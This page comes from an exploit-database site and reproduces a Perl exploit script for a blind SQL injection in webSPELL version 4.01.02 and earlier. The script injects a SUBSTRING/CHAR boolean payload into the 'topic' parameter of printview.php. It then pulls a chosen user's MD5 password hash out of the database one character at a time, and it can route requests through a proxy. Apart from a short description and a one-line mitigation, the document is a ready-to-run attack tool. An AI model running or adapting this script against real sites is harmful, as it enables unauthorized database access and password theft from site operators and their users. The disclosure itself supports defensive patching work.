header-logo
Suggest Exploit
vendor:
webSPELL
by:
DNX
N/A
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: webSPELL
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

webSPELL Remote SQL Injection

This exploit takes advantage of a vulnerability in the webSPELL <= v4.01.02 (topic) software. By injecting SQL code into the 'topic' parameter of the printview.php file, an attacker can execute arbitrary SQL queries on the database. The vulnerability can be exploited by an authenticated or unauthenticated user.

Mitigation:

Install the security fix provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
  print "\n                           \\#'#/                       ";
  print "\n                           (-.-)                        ";
  print "\n   -------------------oOO---(_)---OOo-------------------";
  print "\n   | webSPELL <= v4.01.02 (topic) Remote SQL Injection |";
  print "\n   |                   coded by DNX                    |";
  print "\n   -----------------------------------------------------";
  print "\n[!] Bug: in printview.php line 61, inject sql code in \$topic";
  print "\n[!] Solution: install security fix";
  print "\n[!] Usage: perl ws.pl [Host] [Path] [Topic] <Options>";
  print "\n[!] Example: perl ws.pl 127.0.0.1 /webspell/ -tid 1 -uid 2 -t my_user";
  print "\n[!] Options:";
  print "\n       -tid [no]     Valid topic-ID";
  print "\n       -uid [no]     User-ID, default is 1";
  print "\n       -t [name]     Changed the user table name, default is webs_user";
  print "\n       -p [ip:port]  Proxy support";
  print "\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $user    = 1;
my $table   = "webs_user";
my $topic   = 0;
my %options = ();
GetOptions(\%options, "tid=i", "uid=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"tid"})
{
  $topic = $options{"tid"};
}
else
{
  print "[!] Exploit failed, missing parameter\n";
  exit;
}

if($options{"uid"})
{
  $user = $options{"uid"};
}

if($options{"t"})
{
  $table = $options{"t"};
}

syswrite(STDOUT, "[!] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $found = 0;
  my $h = 48;
  while(!$found && $h <= 57)
  {
    if(istrue3($host, $path, $table, $topic, $user, $i, $h))
    {
      $found = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$found)
  {
    $h = 97;
    while(!$found && $h <= 122)
    {
      if(istrue3($host, $path, $table, $topic, $user, $i, $h))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[!] Exploit done\n";

sub istrue3
{
  my $host  = shift;
  my $path  = shift;
  my $table = shift;
  my $tid   = shift;
  my $uid   = shift;
  my $i     = shift;
  my $h     = shift;
  
  my $ua = LWP::UserAgent->new;
  my $url = "http://".$host.$path."printview.php?board=1&topic=".$tid."'%20AND%20SUBSTRING((SELECT%20password%20FROM%20".$table."%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")/*";
  
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
  
  my $response = $ua->get($url);
  my $content = $response->content;
  my $regexp = "<b>Main Board</b>";
  
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

# milw0rm.com [2007-02-21]

Navigation

Suggest Exploit

Services By CQR